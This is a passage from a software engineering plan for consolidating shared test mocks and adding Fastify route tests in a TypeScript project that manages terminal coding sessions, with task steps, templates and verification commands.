| `test/api-generate-plan.test.ts` | Plan generation API | Mocks validation logic, Port 3191 declared |
|
||||
| `test/auth-security.test.ts` | Auth middleware | Integration tests with WebServer, Ports 3160/3161 |
|
||||
| `test/qr-auth.test.ts` | QR authentication | Integration + unit tests, Port 3162 |
|
||||
|
||||
None of these test the route handlers themselves with real HTTP requests against a running Fastify instance.
|
||||
|
||||
---
|
||||
|
||||
## Design Decisions
|
||||
|
||||
### Shared mocks: Superset strategy
|
||||
|
||||
Rather than creating a lowest-common-denominator mock, `MockSession` in `test/mocks/` will be the **superset** from `respawn-test-utils.ts` (the most complete version). Test files that need a simpler mock can just ignore the extra methods — having unused methods costs nothing, but missing methods forces local re-definition.
|
||||
|
||||
### vi.mock() tests: Don't migrate
|
||||
|
||||
The `session-manager.test.ts` and `ralph-loop.test.ts` tests define mocks inside `vi.mock()` factories. These use **module-level replacement** (replacing `../src/session.js` and `../src/state-store.js` entirely), which is fundamentally different from the direct-instantiation pattern. Migrating them would require `vi.hoisted()` or factory restructuring — high complexity for limited benefit since these mocks are already working. We leave these as-is and create the shared mocks for **new** tests and for the two direct-instantiation tests (Tasks 4–5).
|
||||
|
||||
### MockStateStore: Union of both shapes
|
||||
|
||||
The shared `MockStateStore` in `test/mocks/` will include methods from both existing definitions (session management + Ralph loop), so any **new** test can use it. Methods default to no-ops via `vi.fn()`. Existing `vi.mock()`-based tests are not migrated.
|
||||
|
||||
### Route testing strategy: Lightweight Fastify instances
|
||||
|
||||
Each route test file will:
|
||||
1. Create a minimal `Fastify` instance
|
||||
2. Register **only** the route module under test
|
||||
3. Provide a mock context object satisfying the port interfaces
|
||||
4. Use `app.inject()` (Fastify's built-in test helper) — no real HTTP, no port needed
|
||||
|
||||
This avoids port conflicts entirely and runs fast. Only tests that need SSE or WebSocket behavior will use a real listening server with assigned ports.
|
||||
|
||||
### Port assignments (for tests needing real servers)
|
||||
|
||||
| Port | Test File | Purpose |
|
||||
|------|-----------|---------|
|
||||
| 3220 | `test/routes/session-routes.test.ts` | SSE integration (if needed) |
|
||||
| 3221 | `test/routes/system-routes.test.ts` | Status/stats endpoints |
|
||||
| 3222 | `test/routes/respawn-routes.test.ts` | Respawn API |
|
||||
| 3223 | `test/routes/ralph-routes.test.ts` | Ralph API |
|
||||
| 3224–3229 | Reserved | Future route tests |
|
||||
|
||||
Most tests should NOT need real ports — `app.inject()` is preferred. Verified: ports 3220–3229 are completely unused by existing tests (highest used port is 3211 in `opencode-resize.test.ts`).
|
||||
|
||||
---
|
||||
|
||||
## Task Dependencies
|
||||
|
||||
```
|
||||
Task 1 (Consolidate MockSession)
|
||||
Task 2 (Consolidate MockStateStore)
|
||||
└──> Task 3 (Create test/mocks/ barrel)
|
||||
├──> Task 4 (Migrate respawn-controller.test.ts)
|
||||
├──> Task 5 (Migrate respawn-team-awareness.test.ts)
|
||||
└──> Task 6 (Route test scaffold + helpers)
|
||||
├──> Task 7 (Session routes tests)
|
||||
└──> Task 8 (System + respawn routes tests)
|
||||
|
||||
Task 9 (Slim down respawn-test-utils.ts) — depends on Tasks 4, 5
|
||||
```
|
||||
|
||||
**Tasks 1–2** are independent and can run in parallel.
|
||||
**Task 3** depends on Tasks 1–2.
|
||||
**Tasks 4–6** depend on Task 3 and can run in parallel.
|
||||
**Tasks 7–8** depend on Task 6 and can run in parallel.
|
||||
**Task 9** depends on Tasks 4, 5 (must verify migrations work before removing duplicates from source).
|
||||
|
||||
---
|
||||
|
||||
## Task 1: Consolidate MockSession into `test/mocks/mock-session.ts`
|
||||
|
||||
**Estimated effort**: 2 hours
|
||||
**Files created**: `test/mocks/mock-session.ts`
|
||||
**Files modified**: None yet (consumers migrate in Tasks 4–5)
|
||||
|
||||
### Source
|
||||
|
||||
The canonical MockSession comes from `test/respawn-test-utils.ts` (lines 89–241). It is the most complete version with:
|
||||
|
||||
- All properties needed by `RespawnController`: `id`, `workingDir`, `status`, `writeBuffer`, `terminalBuffer`, `muxName`
|
||||
- `write()` / `writeViaMux()` for input simulation
|
||||
- Buffer inspection: `lastWrite`, `hasWritten(pattern)`, `clearWriteBuffer()`
|
||||
- Terminal simulation: `simulateTerminalOutput()`, `simulatePrompt()`, `simulateReady()`, `simulateCompletionMessage()`, `simulateWorking()`, `simulateClearComplete()`, `simulateInitComplete()`, `simulatePlanModePrompt()`, `simulateElicitationDialog()`, `simulateTokenCount()`, `simulateAnsiOutput()`
|
||||
- Lifecycle: `close()`
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `test/mocks/` directory.
|
||||
2. Create `test/mocks/mock-session.ts`:
|
||||
- Copy the `MockSession` class **exactly** from `test/respawn-test-utils.ts` (lines 89–241)
|
||||
- Copy `terminalOutputs` helper object (tightly coupled to mock)
|
||||
- Copy `createMockSession()` factory function
|
||||
- Export all three: `export { MockSession, createMockSession, terminalOutputs }`
|
||||
- Ensure all `vi` imports come from `vitest`
|
||||
|
||||
**CRITICAL**: Copy the source verbatim — do NOT rewrite the simulation methods. The respawn controller's detection logic matches specific output patterns (e.g., `'\u276f '` for prompt, `'\u273b Worked for'` for completion). Using different patterns would cause test failures.
|
||||
|
||||
### Template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Shared MockSession for tests that need terminal simulation.
|
||||
*
|
||||
* Copied from test/respawn-test-utils.ts (the canonical, most complete version).
|
||||
* Used by respawn, route, and subagent tests.
|
||||
*/
|
||||
import { EventEmitter } from 'node:events';
|
||||
|
||||
// Copy MockSession class exactly from test/respawn-test-utils.ts lines 89–241
|
||||
export class MockSession extends EventEmitter {
|
||||
// ... (copy verbatim from respawn-test-utils.ts)
|
||||
}
|
||||
|
||||
/**
|
||||
* Factory for common terminal output strings.
|
||||
* Must match the patterns used in MockSession's simulate* methods.
|
||||
*/
|
||||
export const terminalOutputs = {
|
||||
// ... (copy verbatim from respawn-test-utils.ts)
|
||||
};
|
||||
|
||||
/**
|
||||
* Convenience factory.
|
||||
*/
|
||||
export function createMockSession(id?: string): MockSession {
|
||||
return new MockSession(id);
|
||||
}
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit # Ensure file compiles
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 2: Consolidate MockStateStore into `test/mocks/mock-state-store.ts`
|
||||
|
||||
**Estimated effort**: 1 hour
|
||||
**Files created**: `test/mocks/mock-state-store.ts`
|
||||
**Files modified**: None (existing vi.mock()-based tests are NOT migrated; this is for new route tests)
|
||||
|
||||
### Source
|
||||
|
||||
Union of both existing definitions:
|
||||
|
||||
- From `test/session-manager.test.ts`: session CRUD methods (`getConfig`, `getSession`, `setSession`, `removeSession`, `getSessions`)
|
||||
- From `test/ralph-loop.test.ts`: Ralph state methods (`getConfig`, `getRalphLoopState`, `setRalphLoopState`, `getTasks`, `setTask`, `removeTask`)
|
||||
|
||||
### Template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Shared MockStateStore for tests.
|
||||
*
|
||||
* Includes methods for both session management and Ralph loop testing.
|
||||
* All methods are vi.fn() spies — tests can override return values as needed.
|
||||
*
|
||||
* NOTE: This is for direct instantiation in new tests. Existing tests that
|
||||
* use vi.mock('../src/state-store.js') keep their inline definitions.
|
||||
*/
|
||||
import { vi } from 'vitest';
|
||||
|
||||
export class MockStateStore {
|
||||
state: Record<string, unknown> = {
|
||||
sessions: {} as Record<string, unknown>,
|
||||
config: { maxConcurrentSessions: 5 },
|
||||
ralphLoop: { status: 'stopped' },
|
||||
tasks: {} as Record<string, unknown>,
|
||||
};
|
||||
|
||||
// Session methods
|
||||
getConfig = vi.fn(() => this.state.config);
|
||||
getSessions = vi.fn(() => this.state.sessions as Record<string, unknown>);
|
||||
getSession = vi.fn((id: string) => (this.state.sessions as Record<string, unknown>)[id]);
|
||||
setSession = vi.fn((id: string, state: unknown) => {
|
||||
(this.state.sessions as Record<string, unknown>)[id] = state;
|
||||
});
|
||||
removeSession = vi.fn((id: string) => {
|
||||
delete (this.state.sessions as Record<string, unknown>)[id];
|
||||
});
|
||||
|
||||
// Ralph state methods
|
||||
getRalphLoopState = vi.fn(() => this.state.ralphLoop);
|
||||
setRalphLoopState = vi.fn((update: Record<string, unknown>) => {
|
||||
this.state.ralphLoop = { ...(this.state.ralphLoop as Record<string, unknown>), ...update };
|
||||
});
|
||||
|
||||
// Task methods
|
||||
getTasks = vi.fn(() => this.state.tasks);
|
||||
setTask = vi.fn();
|
||||
removeTask = vi.fn();
|
||||
|
||||
// Settings methods
|
||||
getSettings = vi.fn(() => ({}));
|
||||
setSettings = vi.fn();
|
||||
|
||||
// Generic persistence
|
||||
save = vi.fn();
|
||||
load = vi.fn();
|
||||
|
||||
/** Reset all state and mocks for clean test isolation */
|
||||
reset(): void {
|
||||
this.state = {
|
||||
sessions: {},
|
||||
config: { maxConcurrentSessions: 5 },
|
||||
ralphLoop: { status: 'stopped' },
|
||||
tasks: {},
|
||||
};
|
||||
vi.clearAllMocks();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 3: Create `test/mocks/index.ts` barrel export
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Depends on**: Tasks 1, 2
|
||||
**Files created**: `test/mocks/index.ts`, `test/mocks/test-helpers.ts`
|
||||
**Files modified**: None
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `test/mocks/test-helpers.ts` with the async utilities from `respawn-test-utils.ts`:
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Reusable async test helpers.
|
||||
* Extracted from respawn-test-utils.ts.
|
||||
*/
|
||||
|
||||
/** Wait for an EventEmitter to emit a specific event, with timeout */
|
||||
export function waitForEvent(
|
||||
emitter: { once: (event: string, listener: (...args: unknown[]) => void) => void },
|
||||
event: string,
|
||||
timeoutMs = 5000,
|
||||
): Promise<unknown> {
|
||||
return new Promise((resolve, reject) => {
|
||||
const timer = setTimeout(
|
||||
() => reject(new Error(`Timed out waiting for event "${event}" after ${timeoutMs}ms`)),
|
||||
timeoutMs,
|
||||
);
|
||||
emitter.once(event, (...args: unknown[]) => {
|
||||
clearTimeout(timer);
|
||||
resolve(args.length === 1 ? args[0] : args);
|
||||
});
|
||||
});
|
||||
}
|
||||
|
||||
/** Create a deferred promise with external resolve/reject */
|
||||
export function createDeferred<T = void>(): {
|
||||
promise: Promise<T>;
|
||||
resolve: (value: T) => void;
|
||||
reject: (reason?: unknown) => void;
|
||||
} {
|
||||
let resolve!: (value: T) => void;
|
||||
let reject!: (reason?: unknown) => void;
|
||||
const promise = new Promise<T>((res, rej) => {
|
||||
resolve = res;
|
||||
reject = rej;
|
||||
});
|
||||
return { promise, resolve, reject };
|
||||
}
|
||||
```
|
||||
|
||||
2. Create `test/mocks/index.ts` barrel:
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Shared test mocks — import from here instead of defining inline.
|
||||
*
|
||||
* @example
|
||||
* import { MockSession, MockStateStore, terminalOutputs } from './mocks/index.js';
|
||||
*/
|
||||
|
||||
export { MockSession, createMockSession, terminalOutputs } from './mock-session.js';
|
||||
export { MockStateStore } from './mock-state-store.js';
|
||||
export { waitForEvent, createDeferred } from './test-helpers.js';
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 4: Migrate `respawn-controller.test.ts` to shared mocks
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Depends on**: Task 3
|
||||
**Files modified**: `test/respawn-controller.test.ts`
|
||||
|
||||
### Steps
|
||||
|
||||
1. Remove the local `MockSession` class definition (approx. 50 lines).
|
||||
2. Add: `import { MockSession } from './mocks/index.js';`
|
||||
3. Verify all test methods still exist on the shared mock. The shared mock is a superset, so all existing usage should work.
|
||||
4. If the local mock had any test-specific customizations (e.g., extra properties added in `beforeEach`), keep those in the test file as inline assignments on the shared instance.
|
||||
5. Run the test to confirm it passes.
|
||||
|
||||
### Potential issues
|
||||
|
||||
- The local mock's `simulateCompletionMessage()` may have a slightly different output format than the shared mock's (from respawn-test-utils.ts). Verify the respawn controller's completion detection regex matches the shared mock's output pattern (`'\u273b Worked for ...'`).
|
||||
- If the local mock adds `pid` or `isWorking` properties that the shared mock doesn't have, add inline assignments in `beforeEach`.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
npx vitest run test/respawn-controller.test.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 5: Migrate `respawn-team-awareness.test.ts` to shared mocks
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Depends on**: Task 3
|
||||
**Files modified**: `test/respawn-team-awareness.test.ts`
|
||||
|
||||
### Steps
|
||||
|
||||
1. Remove the local `MockSession` class definition.
|
||||
2. Add: `import { MockSession } from './mocks/index.js';`
|
||||
3. Keep `MockTeamWatcher` in this file — it's test-specific and extends the real `TeamWatcher`, not a general-purpose mock.
|
||||
4. Run the test to confirm it passes.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
npx vitest run test/respawn-team-awareness.test.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 6: Create route test scaffold and helpers
|
||||
|
||||
**Estimated effort**: 2 hours
|
||||
**Depends on**: Task 3
|
||||
**Files created**: `test/mocks/mock-route-context.ts`, `test/routes/` directory, `test/routes/_route-test-utils.ts`
|
||||
|
||||
### Problem
|
||||
|
||||
The 12 route modules in `src/web/routes/` have zero dedicated test coverage. Each route module takes `(app: FastifyInstance, ctx: PortIntersection)` — we need a reusable way to create mock context objects that satisfy the port interfaces.
|
||||
|
||||
### Design
|
||||
|
||||
Create a `MockRouteContext` factory that builds a mock object satisfying all port interfaces. Each port's methods are `vi.fn()` stubs. Tests can override specific methods as needed.
|
||||
|
||||
### Route registration signatures (verified)
|
||||
|
||||
Each route module requires a specific port intersection. The mock must satisfy all of them:
|
||||
|
||||
| Route Module | Required Ports |
|
||||
|-------------|----------------|
|
||||
| `registerSessionRoutes` | `SessionPort & EventPort & ConfigPort & InfraPort & AuthPort` |
|
||||
| `registerSystemRoutes` | `SessionPort & EventPort & ConfigPort & InfraPort & AuthPort` |
|
||||
| `registerRespawnRoutes` | `SessionPort & EventPort & RespawnPort & ConfigPort & InfraPort` |
|
||||
| `registerRalphRoutes` | `SessionPort & EventPort & RespawnPort & ConfigPort & InfraPort` |
|
||||
| `registerPlanRoutes` | `SessionPort & EventPort & ConfigPort & InfraPort` |
|
||||
| `registerCaseRoutes` | `EventPort & ConfigPort` |
|
||||
| `registerScheduledRoutes` | `SessionPort & EventPort & InfraPort` |
|
||||
| `registerFileRoutes` | `SessionPort` |
|
||||
| `registerMuxRoutes` | `InfraPort` |
|
||||
| `registerPushRoutes` | `InfraPort` |
|
||||
| `registerTeamRoutes` | `InfraPort` |
|
||||
| `registerHookEventRoutes` | `EventPort & AuthPort` |
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `test/mocks/mock-route-context.ts`:
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Mock context for route handler testing.
|
||||
*
|
||||
* Satisfies ALL port interfaces (SessionPort, EventPort, RespawnPort,
|
||||
* ConfigPort, InfraPort, AuthPort) so any route module can be tested.
|
||||
* Override specific methods in individual tests as needed.
|
||||
*
|
||||
* Verified against actual port interfaces in src/web/ports/:
|
||||
* - SessionPort: 6 methods (sessions, addSession, cleanupSession,
|
||||
* setupSessionListeners, persistSessionState, persistSessionStateNow,
|
||||
* getSessionStateWithRespawn)
|
||||
* - EventPort: 5 methods (broadcast, sendPushNotifications, batchTerminalData,
|
||||
* broadcastSessionStateDebounced, batchTaskUpdate)
|
||||
* - RespawnPort: 2 maps + 4 methods
|
||||
* - ConfigPort: 5 readonly + 7 methods (incl getDefaultClaudeMdPath,
|
||||
* getLightState, getLightSessionsState, stopTranscriptWatcher)
|
||||
* - InfraPort: 7 readonly + 2 methods (startScheduledRun, stopScheduledRun)
|
||||
* - AuthPort: 3 readonly (authSessions, qrAuthFailures, https)
|
||||
*/
|
||||
import { vi } from 'vitest';
|
||||
import { MockSession, createMockSession } from './mock-session.js';
|
||||
|
||||
/**
|
||||
* Creates a mock context that satisfies all port interfaces.
|
||||
* Pre-populated with one session for convenience.
|
||||
*/
|
||||
export function createMockRouteContext(options?: { sessionId?: string }) {
|
||||
const sessionId = options?.sessionId ?? 'test-session-1';
|
||||
const session = createMockSession(sessionId);
|
||||
const sessions = new Map<string, MockSession>();
|
||||
sessions.set(sessionId, session);
|
||||
|
||||
return {
|
||||
// -- SessionPort --
|
||||
sessions,
|
||||
addSession: vi.fn(),
|
||||
cleanupSession: vi.fn(),
|
||||
setupSessionListeners: vi.fn(),
|
||||
persistSessionState: vi.fn(),
|
||||
persistSessionStateNow: vi.fn(),
|
||||
getSessionStateWithRespawn: vi.fn((s: unknown) => s),
|
||||
|
||||
// -- EventPort --
|
||||
broadcast: vi.fn(),
|
||||
sendPushNotifications: vi.fn(),
|
||||
batchTerminalData: vi.fn(),
|
||||
broadcastSessionStateDebounced: vi.fn(),
|
||||
batchTaskUpdate: vi.fn(),
|
||||
|
||||
// -- RespawnPort --
|
||||
respawnControllers: new Map(),
|
||||
respawnTimers: new Map(),
|
||||
setupRespawnListeners: vi.fn(),
|
||||
setupTimedRespawn: vi.fn(),
|
||||
restoreRespawnController: vi.fn(),
|
||||
saveRespawnConfig: vi.fn(),
|
||||
|
||||
// -- ConfigPort --
|
||||
store: {
|
||||
getConfig: vi.fn(() => ({})),
|
||||
getSessions: vi.fn(() => ({})),
|
||||
getSession: vi.fn(),
|
||||
setSession: vi.fn(),
|
||||
removeSession: vi.fn(),
|
||||
getSettings: vi.fn(() => ({})),
|
||||
setSettings: vi.fn(),
|
||||
getRalphLoopState: vi.fn(() => ({})),
|
||||
setRalphLoopState: vi.fn(),
|
||||
getTasks: vi.fn(() => ({})),
|
||||
save: vi.fn(),
|
||||
load: vi.fn(),
|
||||
},
|
||||
port: 3000,
|
||||
https: false,
|
||||
testMode: true,
|
||||
serverStartTime: Date.now(),
|
||||
getGlobalNiceConfig: vi.fn(async () => undefined),
|
||||
getModelConfig: vi.fn(async () => null),
|
||||
getClaudeModeConfig: vi.fn(async () => ({})),
|
||||
getDefaultClaudeMdPath: vi.fn(async () => undefined),
|
||||
getLightState: vi.fn(() => ({ sessions: [], status: 'ok' })),
|
||||
getLightSessionsState: vi.fn(() => []),
|
||||
startTranscriptWatcher: vi.fn(),
|
||||
stopTranscriptWatcher: vi.fn(),
|
||||
|
||||
// -- InfraPort --
|
||||
mux: {
|
||||
createSession: vi.fn(),
|
||||
killSession: vi.fn(),
|
||||
listSessions: vi.fn(() => []),
|
||||
getStats: vi.fn(() => ({})),
|
||||
},
|
||||
runSummaryTrackers: new Map(),
|
||||
activePlanOrchestrators: new Map(),
|
||||
scheduledRuns: new Map(),
|
||||
teamWatcher: { getTeams: vi.fn(() => []), hasActiveTeammates: vi.fn(() => false) },
|
||||
tunnelManager: null,
|
||||
pushStore: null,
|
||||
startScheduledRun: vi.fn(),
|
||||
stopScheduledRun: vi.fn(),
|
||||
|
||||
// -- AuthPort --
|
||||
authSessions: null,
|
||||
qrAuthFailures: null,
|
||||
// https already declared above in ConfigPort (shared property)
|
||||
|
||||
// Convenience accessors (not part of any port interface)
|
||||
_session: session,
|
||||
_sessionId: sessionId,
|
||||
};
|
||||
}
|
||||
|
||||
export type MockRouteContext = ReturnType<typeof createMockRouteContext>;
|
||||
```
|
||||
|
||||
2. Add to `test/mocks/index.ts` barrel:
|
||||
|
||||
```typescript
|
||||
export { createMockRouteContext, type MockRouteContext } from './mock-route-context.js';
|
||||
```
|
||||
|
||||
3. Create `test/routes/` directory for route test files.
|
||||
|
||||
4. Create `test/routes/_route-test-utils.ts` with Fastify test helpers:
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* Shared utilities for route testing.
|
||||
*
|
||||
* Creates minimal Fastify instances with just the route module under test
|
||||
* and a mock context. Uses app.inject() for HTTP testing without real ports.
|
||||
*/
|
||||
import Fastify, { type FastifyInstance } from 'fastify';
|
||||
import { createMockRouteContext, type MockRouteContext } from '../mocks/index.js';
|
||||
|
||||
export interface RouteTestHarness {
|
||||
app: FastifyInstance;
|
||||
ctx: MockRouteContext;
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates a Fastify instance with a route module registered against a mock context.
|
||||
*
|
||||
* @param registerFn - The route registration function (e.g., registerSessionRoutes).
|
||||
* Uses `any` for ctx parameter because route functions expect typed port intersections
|
||||
* that MockRouteContext satisfies structurally but not nominally.
|
||||
* @param ctxOptions - Optional overrides for the mock context
|
||||
*/
|
||||
export async function createRouteTestHarness(
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
registerFn: (app: FastifyInstance, ctx: any) => void,
|
||||
ctxOptions?: { sessionId?: string },
|
||||
): Promise<RouteTestHarness> {
|
||||
const app = Fastify({ logger: false });
|
||||
const ctx = createMockRouteContext(ctxOptions);
|
||||
|
||||
registerFn(app, ctx);
|
||||
await app.ready();
|
||||
|
||||
return { app, ctx };
|
||||
}
|
||||
```
|
||||
|
||||
### Why `ctx: any` in the harness
|
||||
|
||||
Route registration functions like `registerSessionRoutes(app, ctx: SessionPort & EventPort & ConfigPort & InfraPort & AuthPort)` expect specific port intersection types. TypeScript won't accept `unknown` here because it's not assignable to the port types. The `MockRouteContext` satisfies the interfaces structurally (it has all the required properties and methods), but since it's not declared as implementing them, we need `any` at the call site. This is the standard pattern for test mocks in TypeScript.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 7: Add session routes tests
|
||||
|
||||
**Estimated effort**: 4 hours
|
||||
**Depends on**: Task 6
|
||||
**Files created**: `test/routes/session-routes.test.ts`
|
||||
**Port**: 3220 (only if SSE tests needed; prefer `app.inject()`)
|
||||
|
||||
### Coverage targets
|
||||
|
||||
`src/web/routes/session-routes.ts` is the largest route module (43 handlers). Focus on the most critical endpoints first:
|
||||
|
||||
#### Priority 1: Session CRUD (must test)
|
||||
|
||||
| Method | Path | What to test |
|
||||
|--------|------|-------------|
|
||||
| `GET` | `/api/sessions` | Returns session list; empty when no sessions |
|
||||
| `GET` | `/api/sessions/:id` | Returns session state; 404 for unknown ID |
|
||||
| `POST` | `/api/sessions` | Creates session; validates workingDir; rejects invalid paths |
|
||||
| `DELETE` | `/api/sessions/:id` | Calls cleanupSession; 404 for unknown ID |
|
||||
|
||||
#### Priority 2: Session I/O
|
||||
|
||||
| Method | Path | What to test |
|
||||
|--------|------|-------------|
|
||||
| `POST` | `/api/sessions/:id/input` | Sends input to session; validates input length; 404 for unknown |
|
||||
| `POST` | `/api/sessions/:id/resize` | Validates cols/rows bounds; 404 for unknown |
|
||||
| `GET` | `/api/sessions/:id/buffer` | Returns terminal buffer; 404 for unknown |
|
||||
|
||||
#### Priority 3: Session actions
|
||||
|
||||
| Method | Path | What to test |
|
||||
|--------|------|-------------|
|
||||
| `POST` | `/api/sessions/:id/run` | Runs prompt on session |
|
||||
| `POST` | `/api/sessions/:id/clear` | Clears session |
|
||||
| `POST` | `/api/sessions/:id/compact` | Compacts session |
|
||||
| `POST` | `/api/sessions/:id/interactive` | Starts interactive mode |
|
||||
| `POST` | `/api/sessions/:id/quick-start` | Quick start flow |
|
||||
|
||||
### Test pattern
|
||||
|
||||
```typescript
|
||||
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
||||
import { createRouteTestHarness, type RouteTestHarness } from './_route-test-utils.js';
|
||||
import { registerSessionRoutes } from '../../src/web/routes/session-routes.js';
|
||||
|
||||
describe('session-routes', () => {
|
||||
let harness: RouteTestHarness;
|
||||
|
||||
beforeEach(async () => {
|
||||
harness = await createRouteTestHarness(registerSessionRoutes);
|
||||
});
|
||||
|
||||
afterEach(async () => {
|
||||
await harness.app.close();
|
||||
});
|
||||
|
||||
describe('GET /api/sessions', () => {
|
||||
it('returns empty array when no sessions', async () => {
|
||||
harness.ctx.sessions.clear();
|
||||
const res = await harness.app.inject({ method: 'GET', url: '/api/sessions' });
|
||||
expect(res.statusCode).toBe(200);
|
||||
expect(JSON.parse(res.body)).toEqual([]);
|
||||
});
|
||||
|
||||
it('returns session list with one session', async () => {
|
||||
const res = await harness.app.inject({ method: 'GET', url: '/api/sessions' });
|
||||
expect(res.statusCode).toBe(200);
|
||||
const sessions = JSON.parse(res.body);
|
||||
expect(sessions).toHaveLength(1);
|
||||
});
|
||||
});
|
||||
|
||||
describe('GET /api/sessions/:id', () => {
|
||||
it('returns 404 for unknown session', async () => {
|
||||
const res = await harness.app.inject({
|
||||
method: 'GET',
|
||||
url: '/api/sessions/nonexistent',
|
||||
});
|
||||
expect(res.statusCode).toBe(404);
|
||||
});
|
||||
});
|
||||
|
||||
describe('POST /api/sessions/:id/input', () => {
|
||||
it('rejects input exceeding max length', async () => {
|
||||
const res = await harness.app.inject({
|
||||
method: 'POST',
|
||||
url: `/api/sessions/${harness.ctx._sessionId}/input`,
|
||||
payload: { input: 'x'.repeat(65537) },
|
||||
});
|
||||
expect(res.statusCode).toBe(400);
|
||||
});
|
||||
});
|
||||
|
||||
describe('POST /api/sessions/:id/resize', () => {
|
||||
it('rejects cols exceeding max', async () => {
|
||||
const res = await harness.app.inject({
|
||||
method: 'POST',
|
||||
url: `/api/sessions/${harness.ctx._sessionId}/resize`,
|
||||
payload: { cols: 501, rows: 24 },
|
||||
});
|
||||
expect(res.statusCode).toBe(400);
|
||||
});
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### Key assertions to include
|
||||
|
||||
- **404 for unknown sessions**: Every `:id` endpoint must return 404 for nonexistent IDs
|
||||
- **Input validation**: Bad paths, oversized inputs, invalid resize dimensions
|
||||
- **Side effects**: Verify `ctx.broadcast()` was called with correct event type after mutations
|
||||
- **Response shape**: Verify response bodies match expected API types
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
npx vitest run test/routes/session-routes.test.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 8: Add system + respawn routes tests
|
||||
|
||||
**Estimated effort**: 4 hours
|
||||
**Depends on**: Task 6
|
||||
**Files created**: `test/routes/system-routes.test.ts`, `test/routes/respawn-routes.test.ts`
|
||||
|
||||
### System routes (`src/web/routes/system-routes.ts`)
|
||||
|
||||
Focus on status and configuration endpoints:
|
||||
|
||||
| Method | Path | What to test |
|
||||
|--------|------|-------------|
|
||||
| `GET` | `/api/status` | Returns server status with uptime, session count |
|
||||
| `GET` | `/api/stats` | Returns mux stats |
|
||||
| `GET` | `/api/config` | Returns current config |
|
||||
| `PUT` | `/api/config` | Updates config; validates input |
|
||||
| `GET` | `/api/settings` | Returns user settings |
|
||||
| `PUT` | `/api/settings` | Updates settings; validates input |
|
||||
| `GET` | `/api/subagents` | Returns subagent list |
|
||||
| `GET` | `/api/screenshots` | Returns screenshot list |
|
||||
|
||||
### Respawn routes (`src/web/routes/respawn-routes.ts`)
|
||||
|
||||
| Method | Path | What to test |
|
||||
|--------|------|-------------|
|
||||
| `GET` | `/api/sessions/:id/respawn` | Returns respawn status; null when not configured |
|
||||
| `POST` | `/api/sessions/:id/respawn/start` | Starts respawn; 404 for unknown session |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | Stops respawn; 404 for unknown session |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | Updates respawn config; validates |
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | Enables respawn loop |
|
||||
| `POST` | `/api/sessions/:id/respawn/disable` | Disables respawn loop |
|
||||
|
||||
### Test patterns
|
||||
|
||||
Same pattern as Task 7 — `createRouteTestHarness` with `registerSystemRoutes` / `registerRespawnRoutes`.
|
||||
|
||||
For respawn tests, pre-populate `ctx.respawnControllers` with a mock controller in `beforeEach`:
|
||||
|
||||
```typescript
|
||||
beforeEach(async () => {
|
||||
harness = await createRouteTestHarness(registerRespawnRoutes);
|
||||
// Add a mock respawn controller for the default session
|
||||
harness.ctx.respawnControllers.set(harness.ctx._sessionId, {
|
||||
getState: vi.fn(() => 'idle'),
|
||||
getConfig: vi.fn(() => ({})),
|
||||
getStatus: vi.fn(() => ({ state: 'idle', health: 100 })),
|
||||
start: vi.fn(),
|
||||
stop: vi.fn(),
|
||||
updateConfig: vi.fn(),
|
||||
enable: vi.fn(),
|
||||
disable: vi.fn(),
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
npx vitest run test/routes/system-routes.test.ts
|
||||
npx vitest run test/routes/respawn-routes.test.ts
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 9: Slim down `respawn-test-utils.ts`
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Depends on**: Tasks 4, 5
|
||||
**Files modified**: `test/respawn-test-utils.ts`
|
||||
|
||||
After Tasks 4–5 are verified passing with shared mocks, slim down `respawn-test-utils.ts` to remove duplicates.
|
||||
|
||||
### Steps
|
||||
|
||||
1. **Remove** from `respawn-test-utils.ts` what has been moved to shared mocks:
|
||||
- `MockSession` class → now in `test/mocks/mock-session.ts`
|
||||
- `createMockSession()` → now in `test/mocks/mock-session.ts`
|
||||
- `terminalOutputs` → now in `test/mocks/mock-session.ts`
|
||||
- `waitForEvent()` / `createDeferred()` → now in `test/mocks/test-helpers.ts`
|
||||
|
||||
2. **Keep** respawn-specific utilities that don't belong in the general mocks:
|
||||
- `TimeController` / `createTimeController()` — respawn-specific timer control
|
||||
- `MockAiIdleChecker` / `MockAiPlanChecker` — respawn-specific AI mocks
|
||||
